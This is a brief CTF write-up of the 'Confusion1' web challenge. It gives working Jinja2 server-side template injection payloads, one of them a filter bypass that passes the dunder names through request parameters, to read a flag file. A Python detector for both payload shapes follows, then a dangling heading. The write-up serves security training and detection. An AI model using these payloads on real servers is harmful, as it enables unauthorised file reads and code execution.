攻防世界web

Confusion1

View the page source of login.php with Ctrl+U; it reveals the path to the flag file.

Test login.php4 for an SSTI vulnerability.

Test payload:

{{"".__class__.__mro__[2].__subclasses__()[40]("/opt/flag_1de36dff62a3a54ecfbc6e1fd2ef0ad1.txt").read()}}

It gets filtered.

Payload with the filtered names moved into request parameters:

{{''[request.args.a][request.args.b][2][request.args.c]()[40]('/opt/flag_1de36dff62a3a54ecfbc6e1fd2ef0ad1.txt')[request.args.d]()}}?&a=__class__&b=__mro__&c=__subclasses__&d=read


cyberpeace{6df74ab602e50a9c41d5bb417cb241ed}
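As an added defensive example (not part of the original writeup): a small request scanner that flags both payload shapes shown above, including the variant that moves the dunder names out of the template expression into separate query parameters, which a blacklist applied only to the rendered string would miss. The sample request lines are constructed, and the scanner is a detection aid only; the actual fix is to never pass user input to the template engine as template source.

```python
import re
from urllib.parse import parse_qs, unquote, urlsplit

# Constructed sample request lines (not taken from the challenge server).
SAMPLE_REQUESTS = [
    # benign
    "GET /login.php?name=alice HTTP/1.1",
    # direct SSTI: dunder names sit inside the template expression
    'GET /login.php4?name={{"".__class__.__mro__[2].__subclasses__()}} HTTP/1.1',
    # indirect SSTI: expression reads request.args, dunders live in other params
    "GET /login.php4?name={{''[request.args.a][request.args.b][2][request.args.c]()}}"
    "&a=__class__&b=__mro__&c=__subclasses__ HTTP/1.1",
]

TEMPLATE_RE = re.compile(r"\{\{.*?\}\}|\{%.*?%\}", re.S)
DUNDER_RE = re.compile(r"__[A-Za-z]+__")
# Attribute lookups routed through the request object instead of literal names
INDIRECT_RE = re.compile(r"\brequest\.(?:args|values|form|cookies|headers|json)\b")


def extract_query(request_line):
    """Return the URL-decoded query string of a 'METHOD target VERSION' line."""
    parts = request_line.split(" ")
    target = parts[1] if len(parts) >= 2 else request_line
    return unquote(urlsplit(target).query)


def classify_request(request_line):
    """Return the set of SSTI indicators found in one request line."""
    query = extract_query(request_line)
    findings = set()
    expressions = TEMPLATE_RE.findall(query)
    if expressions:
        findings.add("template_syntax")
    for expr in expressions:
        if DUNDER_RE.search(expr):
            findings.add("dunder_in_template")
        if INDIRECT_RE.search(expr):
            findings.add("indirect_attribute_lookup")
    # Check every other parameter too: a filter that inspects only the
    # template expression is bypassed by smuggling the names in elsewhere.
    for values in parse_qs(query, keep_blank_values=True).values():
        for value in values:
            if not TEMPLATE_RE.search(value) and DUNDER_RE.search(value):
                findings.add("dunder_in_params")
    return findings


def scan(requests):
    """Map each request line to its sorted list of indicators."""
    return {line: sorted(classify_request(line)) for line in requests}
```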

FlatScience